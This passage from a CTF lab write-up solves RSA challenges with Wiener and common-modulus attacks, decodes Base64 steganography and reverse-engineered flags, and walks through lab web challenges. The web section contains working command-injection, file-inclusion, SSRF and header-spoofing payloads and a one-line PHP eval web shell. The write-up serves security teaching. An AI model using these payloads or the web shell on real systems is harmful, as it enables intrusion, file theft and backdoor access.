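                print(libnum.n2s(int(m)))
                break
            k += 1

    exp(n, e, c)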
    
    flag{20d6e2da95dcc1fa5f5432a436c4be18}
    

* RSA: low decryption exponent 1

  • Challenge
    n = 113881698992379349039968368927979997900777221951663104697020683691495129639829918739755194174063944178083527489820939138302751895652076620380510013941997706327553964127612610209509889011613768847759318892303231846117914554931459295347697888260576901354448014917692680573408654658384481284699735788978230690197
    e = 39068960413447607023613035707248214114819409621234801785480423979473767995171860917209502861408393208940683687475760366491413173744775811644295874981290403938714121977201901942939425294427737703229098649131737380098596135730392902019429964095866394165971291108245774407908011073271822915371753470010435225545
    c = 32897925577913728659288168937025744709859960639901500169867896018406263110205704273203287172003057450591000201857719871686024077615520906540631374442504017489026298422189715372129838501090730593164075113452055617571409044743698645392909829425374093273187125709095368164744188182156849031225036001381531504057
    Find the plaintext m.
    
    
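    import gmpy2
    import libnum


    def continuedFra(x, y):
        """Compute the continued-fraction expansion of x / y.
        :param x: numerator
        :param y: denominator
        :return: list of continued-fraction terms
        """
        cf = []
        while y:
            cf.append(x // y)
            x, y = y, x % y
        return cf


    def gradualFra(cf):
        """Compute the last convergent of the given continued-fraction list.
        :param cf: list of continued-fraction terms
        :return: the last convergent of the list
        """
        numerator = 0
        denominator = 1
        for x in cf[::-1]:
            # Keep the numerator and denominator of the convergent separate.
            # The fraction is built inverted, so for e/n the pair comes out as (d, k).
            numerator, denominator = denominator, x * denominator + numerator
        return numerator, denominator


    def solve_pq(a, b, c):
        """Solve for p and q with Vieta's formulas: x^2 − (p+q)∗x + pq = 0
        :param a: coefficient of x^2
        :param b: coefficient of x
        :param c: pq
        :return: p, q
        """
        disc = b * b - 4 * a * c
        if disc < 0:
            # Wrong candidate: no real roots (gmpy2.isqrt rejects negative input)
            return 0, 0
        par = gmpy2.isqrt(disc)
        return (-b + par) // (2 * a), (-b - par) // (2 * a)


    def getGradualFra(cf):
        """Compute all convergents of the list.
        :param cf: list of continued-fraction terms
        :return: all convergents of the list
        """
        gf = []
        for i in range(1, len(cf) + 1):
            gf.append(gradualFra(cf[:i]))
        return gf


    def wienerAttack(e, n):
        """
        :param e: public exponent
        :param n: modulus
        :return: private key d (None if no convergent works)
        """
        cf = continuedFra(e, n)
        gf = getGradualFra(cf)
        for d, k in gf:
            if k == 0:
                continue
            if (e * d - 1) % k != 0:
                continue
            phi = (e * d - 1) // k
            # p + q = n - phi + 1; the candidate is right when the roots multiply to n
            p, q = solve_pq(1, n - phi + 1, n)
            if p * q == n:
                return d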
    
    n = 113881698992379349039968368927979997900777221951663104697020683691495129639829918739755194174063944178083527489820939138302751895652076620380510013941997706327553964127612610209509889011613768847759318892303231846117914554931459295347697888260576901354448014917692680573408654658384481284699735788978230690197
    e = 39068960413447607023613035707248214114819409621234801785480423979473767995171860917209502861408393208940683687475760366491413173744775811644295874981290403938714121977201901942939425294427737703229098649131737380098596135730392902019429964095866394165971291108245774407908011073271822915371753470010435225545
    c = 32897925577913728659288168937025744709859960639901500169867896018406263110205704273203287172003057450591000201857719871686024077615520906540631374442504017489026298422189715372129838501090730593164075113452055617571409044743698645392909829425374093273187125709095368164744188182156849031225036001381531504057
    d = wienerAttack(e, n)
    m = pow(c, d, n)
    print(libnum.n2s(m))	
    
    flag{20d6e2da95dcc1fa5f5432a436c4be18}
    

* rsa

  • Challenge
    n=7988529900473105188014389056967960086936563867296757743521892517247936779322720860255444942930780242155210428532146832008713545175918837530905634445325434613286924351618434540099301502911121639999829834740539924265403662987413432992208955495360228174246357622824377495215804134031877852138419718863284041289967061947755471763445733857978070389788375692135682151280752698874962994309945007125140767713724007845018476511899517159255148049315657598732020980883906731666463222483082276200161006441236070632697370371903500101576784959354977554163415267670823573732279121475839359214571761531246288036446226453068425024510743430878895525069620567890490274176825219357359655054978914573683875407955166777928775686025208785359965308175183659767780483671664211850622777921251850575660515358213546002740078882179081879033533365462914306416084244064896545443160983307728785861578564664478989753888306751232356332190121325366431859545371415091670360260190699271133604911289835196596206112433828316266654787633268647464346977673202417551515190318166560434792723729979761884387433899987302192101282176134274993622472541295926147573968989742934976154219591883259771200235375181747502029986832498546072186095479928492351
    
    e1*e2=12349
    c1=3956941104485053740097867778863463614429523343802296956471207970766235827952284925375087827795398315065603371450397005812384369786270566468341680820768090028044060468385762612396806935151008409193225425849238432409779352207959601347819331509515142408073169950950260068253219043764412165896916157009543178713020910451557374200427834677059361484489014235064296816116750618582307178177624023709365116378669877631012092848323856887350562541185114608178800058247774480383468504515276293218883642235538269485922732048635945261217203958458777210312461803766231193060881859101042463516118251171784131103804920788352354253909269981900724568137387512987776233999939685033257641191756640718996088154059932650574786345139374148096160762489179144433042422947138557706133141328198729630422754608099697399786108410452796399199904862710178981499375104806904012474580305064294378920608192083444296846169807188253384131823042010303863827711800536625250704063697267629139677266911064618161509078464307097931159951662665685590708492737629563830569911494186947500940490462552820677028344009105765700117517667727014044362864193958365235369782682160000975318516878081759300120335955961150426969912205482822422497294769070680558
    
    c2=1611940015492237858734731702416679090527122709543998562457396582209482921996167319257124263097776719083735533237359282108951840302669400445723290521920778184957860968216955597796434242686387404340853070416671523333827453405378647122312410127116318173381005525906082911269068553644644687609522613704444374579284161594599287938530700830556279127294475519951575045281226065650043844322595522346835332161509830588432537394554004256279802459134435840152155349634866683628780452356511457368210177354837047964988830898418878925069850625303836559634386824904968394360298086999981372436634510871942249878916273086844819675445351650123995763782188534016623013711605415605757989536914844309859096018043139418213410907114483499986615333150567142484962965907979139743566212548602403120444967703145672734078988858122904884088935675452598837463766330894768372179433372531569766978092970858695058828452517992162674715013885642462261934681521697545980035382434568350477172292899604737668561976236375414170887395156146582284416539097502461258716445414441484365722004922543262378425518610840027621580310696876593038167054979299971052068452069502358975143777736130577413933906539382852391849708474118868998134460377344868062
    
    Find the plaintext m.
    
    import libnum
    import gmpy2
    
    n=7988529900473105188014389056967960086936563867296757743521892517247936779322720860255444942930780242155210428532146832008713545175918837530905634445325434613286924351618434540099301502911121639999829834740539924265403662987413432992208955495360228174246357622824377495215804134031877852138419718863284041289967061947755471763445733857978070389788375692135682151280752698874962994309945007125140767713724007845018476511899517159255148049315657598732020980883906731666463222483082276200161006441236070632697370371903500101576784959354977554163415267670823573732279121475839359214571761531246288036446226453068425024510743430878895525069620567890490274176825219357359655054978914573683875407955166777928775686025208785359965308175183659767780483671664211850622777921251850575660515358213546002740078882179081879033533365462914306416084244064896545443160983307728785861578564664478989753888306751232356332190121325366431859545371415091670360260190699271133604911289835196596206112433828316266654787633268647464346977673202417551515190318166560434792723729979761884387433899987302192101282176134274993622472541295926147573968989742934976154219591883259771200235375181747502029986832498546072186095479928492351
    
    # e1*e2 = 12349 = 233 * 53
    e1=233
    e2=53
    
    c1=3956941104485053740097867778863463614429523343802296956471207970766235827952284925375087827795398315065603371450397005812384369786270566468341680820768090028044060468385762612396806935151008409193225425849238432409779352207959601347819331509515142408073169950950260068253219043764412165896916157009543178713020910451557374200427834677059361484489014235064296816116750618582307178177624023709365116378669877631012092848323856887350562541185114608178800058247774480383468504515276293218883642235538269485922732048635945261217203958458777210312461803766231193060881859101042463516118251171784131103804920788352354253909269981900724568137387512987776233999939685033257641191756640718996088154059932650574786345139374148096160762489179144433042422947138557706133141328198729630422754608099697399786108410452796399199904862710178981499375104806904012474580305064294378920608192083444296846169807188253384131823042010303863827711800536625250704063697267629139677266911064618161509078464307097931159951662665685590708492737629563830569911494186947500940490462552820677028344009105765700117517667727014044362864193958365235369782682160000975318516878081759300120335955961150426969912205482822422497294769070680558
    
    c2=1611940015492237858734731702416679090527122709543998562457396582209482921996167319257124263097776719083735533237359282108951840302669400445723290521920778184957860968216955597796434242686387404340853070416671523333827453405378647122312410127116318173381005525906082911269068553644644687609522613704444374579284161594599287938530700830556279127294475519951575045281226065650043844322595522346835332161509830588432537394554004256279802459134435840152155349634866683628780452356511457368210177354837047964988830898418878925069850625303836559634386824904968394360298086999981372436634510871942249878916273086844819675445351650123995763782188534016623013711605415605757989536914844309859096018043139418213410907114483499986615333150567142484962965907979139743566212548602403120444967703145672734078988858122904884088935675452598837463766330894768372179433372531569766978092970858695058828452517992162674715013885642462261934681521697545980035382434568350477172292899604737668561976236375414170887395156146582284416539097502461258716445414441484365722004922543262378425518610840027621580310696876593038167054979299971052068452069502358975143777736130577413933906539382852391849708474118868998134460377344868062
    
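    def exp_def(e1, e2, c1, c2, n):
        # Common-modulus attack: c1 and c2 encrypt the same m under e1 and e2 with one n.
        # gcdext returns s, s1, s2 with s1*e1 + s2*e2 = s = gcd(e1, e2),
        # so c1^s1 * c2^s2 = m^s (mod n); a negative exponent is a modular inverse.
        s, s1, s2 = gmpy2.gcdext(e1, e2)
        m = gmpy2.iroot((pow(c1, s1, n) * pow(c2, s2, n)) % n, s)[0]
        return int(m)

    m = exp_def(e1, e2, c1, c2, n)
    print(libnum.n2s(m))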
    
    
    flag{f96b697d7cb7938d525a2f31aaf161d0}
    

* basebase

  • Challenge
    
    import base64

    def get_diff(s1, s2):
        """Compare the stego line s1 with its canonical re-encoding s2 and return
        the alphabet-index distance at the first differing character."""
        base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
        for i in range(len(s2)):
            if s1[i] != s2[i]:
                # stego value minus the canonical value gives the hidden bits
                return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))
        return 0


    def b64_stego_decode():
        # "处理过的文本.txt" is the challenge text after cleaning it up
        with open("处理过的文本.txt", "rb") as file:
            lines = file.readlines()
        print(len(lines))
        x = ''                                      # x is the recovered bit string
        count = 0
        for line in lines:
            stego = str(line, encoding="utf-8").strip()
            count = count + 1
            # Use the statement below to work out which line is broken,
            # then find the problem by eye and fix it by hand
            print(count)
            # Decode, then re-encode, to obtain the canonical Base64 form of the line
            realtext = str(base64.b64encode(base64.b64decode(stego)), encoding="utf-8")
            diff = get_diff(stego, realtext)        # difference between the stego line and the canonical line
            n = stego.count('=')                    # each '=' leaves 2 spare bits
            if diff:
                x += bin(diff)[2:].zfill(n * 2)
            else:
                x += '0' * n * 2
        flag = ''
        for i in range(0, len(x), 8):
            byte = int(x[i:i + 8], 2)
            if byte:                                # skip all-zero bytes
                flag += chr(byte)
        print(len(flag))
        print(flag)

    if __name__ == '__main__':
        b64_stego_decode()
    	
    
    flag{guowangjishuxueyuan}
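
Both Base64 challenges above rely on the spare low bits of the last character before the `=` padding, which a canonical encoder always leaves at zero. The audit below is an added example, not part of the original post: it reports malformed lines by number (the manual step in the basebase script), flags lines whose spare bits are non-zero, and recovers the hidden bytes. `COVERS`, `make_sample`, `spare_bits`, `audit` and the sample text are constructed for illustration.

```python
import base64
import re

B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
LINE_RE = re.compile(r"[A-Za-z0-9+/]*={0,2}")

# Constructed cover text (not taken from the challenge files).
COVERS = [b"alpha", b"bravo!!", b"charlie", b"delta-x", b"echo", b"foxtrot", b"golf-9"]


def spare_bits(line):
    """Bits a canonical encoder sets to zero: the low 4 bits of the last data
    character before '==', the low 2 bits before '=', none without padding."""
    pad = len(line) - len(line.rstrip("="))
    if pad == 0:
        return ""
    width = 2 * pad
    value = B64.index(line[-pad - 1]) & ((1 << width) - 1)
    return format(value, "0{}b".format(width))


def audit(lines):
    """Return (malformed, noncanonical, payload).

    malformed:    1-based numbers of lines with foreign characters or a length
                  that is not a multiple of 4 (fix these before trusting payload)
    noncanonical: lines whose spare bits are non-zero
    payload:      spare bits of the well-formed lines packed into bytes, NULs dropped
    """
    malformed, noncanonical, bits = [], [], ""
    for number, raw in enumerate(lines, 1):
        line = raw.strip()
        if not line:
            continue
        if len(line) % 4 or not LINE_RE.fullmatch(line):
            malformed.append(number)
            continue
        found = spare_bits(line)
        if "1" in found:
            noncanonical.append(number)
        bits += found
    whole = len(bits) - len(bits) % 8          # ignore a trailing partial byte
    payload = bytes(int(bits[i:i + 8], 2) for i in range(0, whole, 8))
    return malformed, noncanonical, payload.replace(b"\x00", b"")


def make_sample(covers, secret):
    """Build constructed test input: encode each cover line and place the
    secret's bits in the spare positions, zero-filling what is left over."""
    bits = "".join(format(b, "08b") for b in secret)
    out = []
    for cover in covers:
        enc = base64.b64encode(cover).decode()
        pad = enc.count("=")
        if pad:
            width = 2 * pad
            chunk = bits[:width].ljust(width, "0")
            bits = bits[width:]
            idx = len(enc) - pad - 1
            enc = enc[:idx] + B64[B64.index(enc[idx]) | int(chunk, 2)] + enc[idx + 1:]
        out.append(enc)
    return out


if __name__ == "__main__":
    sample = make_sample(COVERS, b"hi")
    print(audit(sample))
    # Simulate a damaged line such as the ones in the basebase challenge text
    sample[2] = sample[2][:4] + "*" + sample[2][4:]
    print(audit(sample))
```

A skipped malformed line shifts every later bit, so the payload is only meaningful once the malformed list is empty.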
    

III. Decompiling Executables and Decryption

1. Solving the reverse-engineering lab challenges

* re1

    # Bytes copied from the binary: repeated "C6 44 24 disp8 imm8" instructions
    # (mov byte ptr [esp+disp8], imm8); every fifth byte is one character.
    a = [0xC6, 0x44, 0x24, 0x2F, 0x66, 0xC6, 0x44, 0x24, 0x2E, 0x6C,
      0xC6, 0x44, 0x24, 0x2D, 0x61, 0xC6, 0x44, 0x24, 0x2C, 0x67,
      0xC6, 0x44, 0x24, 0x2B, 0x7B, 0xC6, 0x44, 0x24, 0x2A, 0x52,
      0xC6, 0x44, 0x24, 0x29, 0x65, 0xC6, 0x44, 0x24, 0x28, 0x5F,
      0xC6, 0x44, 0x24, 0x27, 0x31, 0xC6, 0x44, 0x24, 0x26, 0x73,
      0xC6, 0x44, 0x24, 0x25, 0x5F, 0xC6, 0x44, 0x24, 0x24, 0x53,
      0xC6, 0x44, 0x24, 0x23, 0x30, 0xC6, 0x44, 0x24, 0x22, 0x5F,
      0xC6, 0x44, 0x24, 0x21, 0x43, 0xC6, 0x44, 0x24, 0x20, 0x30,
      0xC6, 0x44, 0x24, 0x1F, 0x4F, 0xC6, 0x44, 0x24, 0x1E, 0x4C,
      0xC6, 0x44, 0x24, 0x1D, 0x7D]
    flag = ''
    for i in range(4, len(a), 5):
        flag += chr(a[i])
    print(flag)

    flag{Re_1s_S0_C0OL}

* re2

    import base64
    # DICT is the standard Base64 alphabet, DICT1 the custom one
    DICT='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
    DICT1='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/='
    a='pCNxpTJ2d3d5nPoQnSAAnQBel4lihldkikV78nQ='
    b=''
    # Map each character from the custom alphabet back to the standard one
    for i in range(len(a)):
        b+=DICT[DICT1.index(a[i])]
    print(b)
    print(base64.b64decode(b))

    flag{B43E_64_i$_INTERESTING!}

* re3

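    import base64
    a='e3nifIH9b_C@n@dH'
    shifted=''
    for i in range(len(a)):
        shifted+=chr(ord(a[i])-i)        # undo the per-position offset
    print(shifted)
    # The shifted string is Base64; decoding it gives the text inside the flag
    print('flag'+base64.b64decode(shifted).decode())

    flag{i_l0ve_you}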

* re4

    # Bytes copied from the binary: repeated "C6 45 disp8 imm8" instructions
    # (mov byte ptr [ebp+disp8], imm8); every fourth byte is one data byte.
    a=[0xC6, 0x45, 0xD0, 0x66, 0xC6, 0x45, 0xD1, 0xA0, 0xC6, 0x45,
      0xD2, 0xB6, 0xC6, 0x45, 0xD3, 0xC0, 0xC6, 0x45, 0xD4, 0x77,
      0xC6, 0x45, 0xD5, 0xE0, 0xC6, 0x45, 0xD6, 0x16, 0xC6, 0x45,
      0xD7, 0x41, 0xC6, 0x45, 0xD8, 0x97, 0xC6, 0x45, 0xD9, 0xC0,
      0xC6, 0x45, 0xDA, 0xF7, 0xC6, 0x45, 0xDB, 0xB2, 0xC6, 0x45,
      0xDC, 0x06, 0xC6, 0x45, 0xDD, 0x52, 0xC6, 0x45, 0xDE, 0x06,
      0xC6, 0x45, 0xDF, 0x01, 0xC6, 0x45, 0xE0, 0xD7, 0xC6, 0x45,
      0xE1, 0x21, 0xC6, 0x45, 0xE2, 0x46, 0xC6, 0x45, 0xE3, 0xD0,
      0xC6, 0x45, 0xE4, 0x36, 0xC6, 0x45, 0xE5, 0x40, 0xC6, 0x45,
      0xE6, 0x97]
    flag = ''
    b=[]
    for i in range(3,len(a),4):
      # Swap the high and low nibbles
      b.append(((a[i]*16)&0xff)|(a[i]>>4))
    print(b)
    # Each byte after the first is XORed with the previous byte
    flag +=chr(b[0])
    for i in range(1,len(b)):
      flag +=chr(b[i]^b[i-1])
    print(flag)

    flag{youmusTKEEpmoving}

* re5

    a2=[
      0x7E, 0x74, 0x75, 0x7F, 0x67, 0x63, 0x24, 0x63, 0x60, 0x65,
      0x74, 0x6D, 0x24, 0x7D, 0x43, 0x25, 0x7A, 0x69]

    v7=18    # XOR key
    flag=''
    # The bytes are processed in groups of three, each position with its own transform
    for i in range(0,18,3):
        flag+=chr((v7^a2[i])-6)
        flag+=chr((a2[i+1]^v7)+6)
        flag+=chr(a2[i+2]^6^v7)
    print(flag)

    flag{w0wtqly0uW1n}

IV. Red/Blue Team Attack and Defense Exercise: Web Security

1. Walkthrough of the lab's web challenges

* Interesting features of PHP

  • Challenge
    Challenge: PHP is a weakly typed language
    Solution:
    Append to the request line: ?a=PJNPDWY&b=QNKCDZO&c=123&d=php://input
    Request body: 123
    
    flag{ab4ea15bd59038a6c7b823ebeee4b8ba}
    

* phpBestLanguage

  • Challenge
    Challenge: http://172.31.27.248:8109 PHP is the best language in the world
    Solution:
    Request line: ?ac=123&fn=php://input
    Request body: 123
    
    flag{5592f1a9fa885a77ba55497e501a101a}
    

* Command execution: ping ping ping

  • Challenge
    Solution:
    127.0.0.1 | ls
    127.0.0.1 | cat f14g_saikjmld98401294.php
    
    flag{random_php_flag_there}
    

* File inclusion 2

  • Challenge
    Challenge: http://172.31.27.248:8107 Can you read the contents of flag.php?
    Solution: http://172.31.27.248:8107/index.php?file=php://filter/read=convert.base64-encode/resource=flag.php
    This returns the file contents Base64-encoded; then decode them.
    
    flag{792b5e3054812cfe1f41ba3dda2a2948}
    
  • File inclusion
    Challenge: http://172.31.27.248:8106 The flag is in the root directory!
    Solution: http://172.31.27.248:8106/index.php?file=/flag
    
    flag{d41d8cd98f00b204e9800998ecf8427e}
    

* File upload

  • Challenge
    Challenge: http://172.31.27.248:8103 Only GIFs can be uploaded!!!
    Solution:
    <?php
    @eval($_POST[ljj]);
    ?>
    
    flag = "flag{ffffffffllllaaggg_!!!}
    

* ssrf

  • Challenge
    Challenge: http://172.31.27.248:8102
    Solution: http://172.31.27.248:8102/?url=file:///flag.txt
    
    flag{4787370fb09bd230f863731d2ffbff6a}
    

* xff

  • Challenge
    Challenge: http://172.31.27.248:8101 Please access the service from the local machine
    Solution:
    x-forwarded-for:127.0.0.1
    referer:http://127.0.0.1 
    
    flag{15cc8eee88302965c61497c147e6ca4c}
    

* WEB-GET

  • Challenge
    Challenge: http://172.31.27.248:1024/
    Solution: http://172.31.27.248:1024/?what=flag
    
    flag{Bugku_get_su8kej2en}
    